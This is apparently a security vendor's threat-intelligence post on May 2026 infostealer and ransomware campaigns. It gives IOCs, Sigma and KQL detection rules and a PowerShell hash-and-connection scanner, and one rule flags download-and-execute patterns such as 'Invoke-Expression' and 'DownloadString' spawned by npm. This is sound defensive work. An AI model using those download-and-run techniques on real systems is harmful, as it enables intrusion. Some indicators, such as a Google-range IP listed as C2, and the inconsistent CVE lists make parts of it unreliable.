Back to Intelligence

Vidar v1.5, Gremlin & Shai-Hulud: OTX Pulse Analysis — Credential Theft Campaigns

SA
Security Arsenal Team
May 19, 2026
6 min read

The AlienVault OTX pulses from May 19, 2026, reveal a coordinated surge in infostealer activity targeting enterprise credentials and cryptocurrency assets. The intelligence highlights the evolution of established families like Vidar (rewritten in Go for evasion), Gremlin Stealer (using advanced resource obfuscation), and the emergence of supply-chain attacks via the Shai-Hulud worm within the npm ecosystem. Additionally, threat actor UAT-8616 and the The Gentlemen RaaS operation are actively exploiting edge infrastructure (Cisco SD-WAN, Fortinet) to gain initial access for webshell deployment and credential theft. SOC teams are advised to immediately hunt for Go-based binaries and suspicious npm activity.

Threat Summary

This intelligence snapshot paints a picture of a highly adaptive credential theft landscape. Threat actors are diversifying their delivery methods—moving from traditional phishing to supply-chain compromises (Shai-Hulud via npm) and infrastructure exploitation (Cisco/Fortinet vulnerabilities).

  • Campaign Objectives: Primary objectives include harvesting browser credentials, crypto-wallets, and session tokens. Secondary objectives include deploying cryptocurrency miners (XMRig) and establishing persistence via webshells and backdoors (SystemBC).
  • Attack Chain: Actors gain initial access via malicious npm packages or by exploiting CVE-2026-20128 (Cisco SD-WAN) / CVE-2024-55591 (Fortinet). Upon access, they deploy droppers that utilize commercial packing or Go-compiled binaries to evade detection. C2 communications are obfuscated using legitimate services like Telegram and Steam profiles (Vidar) or commercial virtual machine-based obfuscation (Gremlin).

Threat Actor / Malware Profile

Vidar v1.5 (Go)

  • Family: Infostealer (Arkei descendant)
  • Distribution: Malicious payloads, likely delivered via SEO poisoning or bundling.
  • Behavior: Snatches browser data, Steam sessions, and 2FA codes.
  • C2: Uses "dead-drop" URLs hosted on Telegram and Steam profile pages to receive tasking.
  • Evasion: Heavily obfuscated Go binary (v1.25.4) featuring a 12-category sandbox scoring system to terminate analysis.

Gremlin Stealer

  • Family: Infostealer
  • Distribution: Phishing campaigns.
  • Behavior: Siphons payment card details and browser data.
  • Evasion: Employs instruction virtualization via a commercial packing utility; transforms code into custom bytecode executed by a private VM. Hides payloads in embedded resource files.

Shai-Hulud (NPM Worm)

  • Family: Worm / Infostealer
  • Distribution: Supply-chain attack (npm packages: chalk-tempalte, axios-util, etc.).
  • Behavior: Acts as a worm to spread and harvests credentials/cryptocurrency.

The Gentlemen (RaaS)

  • Actor: The Gentlemen
  • Malware: SystemBC (Proxy)
  • Distribution: Exploits Fortinet (CVE-2024-55591) and Cisco (CVE-2025-32433) edge appliances via NTLM relay.
  • Behavior: Recently suffered a backend leak ("Rocket"), exposing credentials. Uses SystemBC to tunnel traffic and maintain access.

IOC Analysis

The provided indicators span multiple infrastructure types used for C2, payload delivery, and initial access:

  • File Hashes (SHA256/MD5): High-fidelity indicators for the Vidar, Gremlin, and SystemBC payloads. SOC teams should immediately block execution of these hashes on endpoints via EDR isolation policies.
  • Network Infrastructure (IPv4/URL): Specific IPs (e.g., 149.154.167.99, 194.87.92.109) and hostnames (lhr.life domains) serve as C2 nodes. The use of Telegram and Steam IPs requires careful whitelisting to avoid blocking legitimate traffic, necessitating context-aware blocking (e.g., blocking if TLS SNI does not match expected service or if traffic originates from non-browser user agents).
  • CVEs: (CVE-2026-20128, CVE-2026-20133, CVE-2024-55591) indicate the attack surface. Vulnerability scanning must prioritize these signatures on edge devices.

Operational teams should ingest these IOCs into SIEM correlation engines and firewall blocklists immediately.

Detection Engineering

YAML
---
title: Potential Vidar Stealer v1.5 Go Binary Activity
id: 7d1c2e3f-4a5b-6789-0123-456789abcdef
status: experimental
description: Detects potential execution of Vidar v1.5, a Go-based infostealer observed using dead-drop C2s and heavy sandbox checks. Targets specific C2 IPs associated with the campaign.
references:
    - https://otx.alienvault.com/pulse/6649a953e38d6a7393b50169
author: Security Arsenal
date: 2026/05/19
tags:
    - attack.execution
    - attack.credential_access
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationIp|contains:
            - '149.154.167.99'
            - '135.181.237.59'
            - '142.250.151.94'
            - '194.87.92.109'
    condition: selection
falsepositives:
    - Legitimate traffic to Steam or Telegram infrastructure (verify user agent and process context).
level: high
---
title: Suspicious NPM Child Process Execution (Shai-Hulud Activity)
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
status: experimental
description: Detects suspicious child processes spawned by Node.js or npm, potentially indicating execution of the Shai-Hulud worm or malicious packages like chalk-tempalte stealing credentials.
references:
    - https://otx.alienvault.com/pulse/664c928c8c44b94040b2953b
author: Security Arsenal
date: 2026/05/19
tags:
    - attack.execution
    - attack.initial_access
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\node.exe'
            - '\npm.cmd'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\wscript.exe'
        CommandLine|contains:
            - 'Invoke-Expression'
            - 'DownloadString'
            - 'clipboard'
    condition: all of selection_*
falsepositives:
    - Legitimate build scripts running post-install tasks.
level: medium
---
title: Potential SystemBC Proxy Activity (The Gentlemen Campaign)
id: f1e2d3c4-5678-90ab-cdef-abcdef123456
status: experimental
description: Detects potential SystemBC proxy usage associated with The Gentlemen RaaS, often deployed via Fortinet/Cisco exploits.
references:
    - https://otx.alienvault.com/pulse/664a2de5f6c268463b065c03
author: Security Arsenal
date: 2026/05/19
tags:
    - attack.command_and_control
    - attack.defense_evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\systembc.exe'
        Company|contains: 'SystemBC'
    condition: selection
falsepositives:
    - Unknown (rare in legitimate environments).
level: critical


kql
// Hunt for Vidar and Gremlin Stealer Hashes
DeviceProcessEvents
| where SHA256 in (
    "2995ffb73342453b258926ec865c724e3567eee1bb8eb35d61796ee0c4f25105",
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5",
    "2172dae9a5a695e00e0e4609e7db0207d8566d225f7e815fada246ae995c0f9b",
    "281b970f281dbea3c0e8cfc68b2e9939b253e5d3de52265b454d8f0f578768a2",
    "691896c7be87f47f3e9ae914d76caaf026aaad0a1034e9f396c2354245215dc3",
    "971198ff86aeb42739ba9381923d0bc6f847a91553ec57ea6bae5becf80f8759",
    "9aab30a3190301016c79f8a7f8edf45ec088ceecad39926cfcf3418145f3d614",
    "9fda1ddb1acf8dd3685ec31b0b07110855832e3bed28a0f3b81c57fe7fe3ac20",
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
    "51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2"
)
| project Timestamp, DeviceName, FileName, ProcessCommandLine, SHA256, AccountName, FolderPath
;
// Hunt for Network Connections to Malicious IPs (Vidar/Gremlin/Shai-Hulud)
DeviceNetworkEvents
| where RemoteIP in ("149.154.167.99", "135.181.237.59", "142.250.151.94", "194.87.92.109", "80.200.28.28")
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine


powershell
# IOC Hunt for Vidar, Gremlin, and The Gentlemen Campaigns
# Check for presence of malicious file hashes on disk
$MaliciousHashes = @(
    "2995ffb73342453b258926ec865c724e3567eee1bb8eb35d61796ee0c4f25105",
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5",
    "2172dae9a5a695e00e0e4609e7db0207d8566d225f7e815fada246ae995c0f9b",
    "281b970f281dbea3c0e8cfc68b2e9939b253e5d3de52265b454d8f0f578768a2",
    "691896c7be87f47f3e9ae914d76caaf026aaad0a1034e9f396c2354245215dc3",
    "971198ff86aeb42739ba9381923d0bc6f847a91553ec57ea6bae5becf80f8759",
    "9aab30a3190301016c79f8a7f8edf45ec088ceecad39926cfcf3418145f3d614",
    "9fda1ddb1acf8dd3685ec31b0b07110855832e3bed28a0f3b81c57fe7fe3ac20",
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
    "51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2"
)

Write-Host "Scanning for malicious files (Vidar/Gremlin)..." -ForegroundColor Yellow

# Search common user directories and temp folders
$Paths = @("$env:USERPROFILE\Downloads", "$env:USERPROFILE\AppData\Local\Temp", "$env:APPDATA", "C:\ProgramData")

foreach ($Path in $Paths) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | Where-Object { 
            $_.Length -gt 0 -and $_.Extension -in ('.exe', '.dll', '.bin') 
        } | ForEach-Object {
            try {
                $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
                if ($MaliciousHashes -contains $Hash) {
                    Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
                }
            } catch {
                # Ignore access errors
            }
        }
    }
}

# Check for active network connections to Shai-Hulud C2
$MaliciousIPs = @("80.200.28.28", "194.87.92.109")
Write-Host "Checking active network connections for Shai-Hulud C2..." -ForegroundColor Yellow

Get-NetTCPConnection | Where-Object { 
    $MaliciousIPs -contains $_.RemoteAddress 
} | ForEach-Object {
    $Process = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    if ($Process) {
        Write-Host "[!] SUSPICIOUS CONNECTION: RemoteIP $($_.RemoteAddress) PID $($_.OwningProcess) Process $($Process.ProcessName) Path $($Process.Path)" -ForegroundColor Red
    }
}


# Response Priorities

*   **Immediate:** Block all identified malicious IP addresses and domains at the perimeter. Disable the use of the specific malicious npm packages (`chalk-tempalte`, `@deadcode09284814/axios-util`) in internal artifact repositories.
*   **24h:** Conduct a credential audit for any accounts associated with developers who may have executed the malicious npm packages. Force password resets and token rotation for any credentials suspected of being stolen by Vidar or Gremlin.
*   **1 Week:** Patch all Cisco Catalyst SD-WAN and Fortinet edge appliances immediately to address CVE-2026-20128 and CVE-2024-55591. Review logs for NTLM relay activity associated with "The Gentlemen" indicators.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsvidargremlin-stealershai-huludthe-gentlemensupply-chain-attack

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action